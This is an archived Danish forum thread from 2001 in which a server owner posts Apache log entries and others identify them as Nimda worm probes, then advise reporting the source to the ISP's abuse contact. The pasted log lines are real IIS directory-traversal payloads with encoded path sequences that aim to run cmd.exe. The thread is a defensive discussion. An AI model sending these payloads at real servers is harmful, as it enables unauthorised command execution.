/ Forside / Teknologi / Operativsystemer / Linux / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Linux
#NavnPoint
o.v.n. 11177
peque 7911
dk 4814
e.c 2359
Uranus 1334
emesen 1334
stone47 1307
linuxrules 1214
Octon 1100
10  BjarneD 875
httpd log....
Fra : Peter Andersen


Dato : 06-10-01 12:01

Hvad er nedenstående tegn på? jeg får den USTANDSELIG..... og stort set
altid fra teledk adsl forbindelser...
Er det Nimb`?

vh. Peter ANdersne



80.62.90.250 - - [06/Oct/2001:03:33:00 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 306
80.62.90.250 - - [06/Oct/2001:03:33:01 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
80.62.90.250 - - [06/Oct/2001:03:33:02 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 337
80.62.90.250 - - [06/Oct/2001:03:33:03 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 337
80.62.90.250 - - [06/Oct/2001:03:33:04 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy
stem32/cmd.exe?/c+dir HTTP/1.0" 404 353
80.62.90.250 - - [06/Oct/2001:03:33:04 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
80.62.90.250 - - [06/Oct/2001:03:33:05 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
80.62.90.250 - - [06/Oct/2001:03:33:06 +0200] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
80.62.90.250 - - [06/Oct/2001:03:33:06 +0200] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 303
80.62.90.250 - - [06/Oct/2001:03:33:07 +0200] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 303
80.62.90.250 - - [06/Oct/2001:03:33:07 +0200] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320
80.62.90.250 - - [06/Oct/2001:03:33:08 +0200] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320



 
 
Michael Rasmussen (06-10-2001)
Kommentar
Fra : Michael Rasmussen


Dato : 06-10-01 12:10

Peter Andersen wrote:
>
> Hvad er nedenstående tegn på? jeg får den USTANDSELIG..... og stort
> set altid fra teledk adsl forbindelser...
> Er det Nimb`?

Ja, det er Nimda, der er på udkig efter huller i Microsoft's software.

Læs evt. <URL: http://www.csirt.dk/newssystem/display.asp?ArticleID=172>


--
Med venlig hilsen
Michael Rasmussen


Lars Kristensen (07-10-2001)
Kommentar
Fra : Lars Kristensen


Dato : 07-10-01 09:43


Michael Rasmussen <michael@chatroom-dansk.dk> skrev i en
nyhedsmeddelelse:3BBEE66A.141B51F3@chatroom-dansk.dk...
> Peter Andersen wrote:
> >
> > Hvad er nedenstående tegn på? jeg får den USTANDSELIG..... og stort
> > set altid fra teledk adsl forbindelser...
> > Er det Nimb`?
>
> Ja, det er Nimda, der er på udkig efter huller i Microsoft's software.
>

Jeg får dem også hele tiden. Det er egentlig ret irriterende at folk ikke
laver deres securityupdates. Jeg går og overvejer hvordan man får fat i de
folk der har Code Red, Nimbda etc. De er tilsyneladende ikke selv bevidste
om at deres computer er inficeret med en orm! Typisk hvis man går ind på
deres hjemmeside er den eneste besked man får: "Under construction" Dvs. der
står ikke nogen e-mail man kan kontakte dem på!
Jeg skrev til teledanmark og spurgte om de ville tage action på problemet
hvis man sendte dem ip-adr. og tid, men det vil de ikke!
Hvad gør man ved det (ud over at sidde og fryde sig over at man kører apache
:o] )? Kan man på anden måde kontakte dem?

Mvh
Lars





Peter Brodersen (07-10-2001)
Kommentar
Fra : Peter Brodersen


Dato : 07-10-01 11:33

On Sun, 7 Oct 2001 10:42:52 +0200, "Lars Kristensen"
<atctrl@hotmail.com> wrote:

>Jeg får dem også hele tiden. Det er egentlig ret irriterende at folk ikke
>laver deres securityupdates.

Hvorfor er det, at dem, der ikke er sårbare, også er dem, der bruger
mest tid på at kigge i logs, være irriteret, piske en stemning op,
etc.? Det lyder jo næsten som en omgang ZoneAlarm.

>Jeg skrev til teledanmark og spurgte om de ville tage action på problemet
>hvis man sendte dem ip-adr. og tid, men det vil de ikke!

Smid en mail til deres abuse-afdeling. Det er i hvert fald den normale
praksis hos en del udbydere. Så har man gjort, hvad man kan.

--
- Peter Brodersen

Michael Rasmussen (08-10-2001)
Kommentar
Fra : Michael Rasmussen


Dato : 08-10-01 12:21

Lars Kristensen wrote:
>
> Jeg får dem også hele tiden. Det er egentlig ret irriterende at folk
> ikke laver deres securityupdates. Jeg går og overvejer hvordan man får
> fat i de folk der har Code Red, Nimbda etc.

Hvis du har flere maskiner, og de ikke alle kører med webservere, kan du
prøve at kigge på <URL: http://hts.dshield.org/LaBrea>. Jeg har dog ikke
selv erfaring med det.

> De er tilsyneladende ikke selv bevidste om at deres computer er
> inficeret med en orm!

I mange tilfælde er det private forbrugere, der måske dårligt ved at de
har en webserver på deres maskine. Derfor indeholder den heller ikke
nogle "rigtige" sider, og samtidig vil brugeren jo næppe tænke over et
indslag i diverse medier, hvor der nævnes at Microsoft webservere kan
rammes af den og den svaghed.

> Hvad gør man ved det (ud over at sidde og fryde sig over at man kører > apache :o] )? Kan man på anden måde kontakte dem?

Udover at slå ip-adressen op (f.eks. i RIPE, hvis den er europæisk), og
kontakte abuse@... for det berørte ip-net, kan man ikke gøre så meget.


--
Med venlig hilsen
Michael Rasmussen


Søg
Reklame
Statistik
Spørgsmål : 177557
Tips : 31968
Nyheder : 719565
Indlæg : 6408885
Brugere : 218888

Månedens bedste
Årets bedste
Sidste års bedste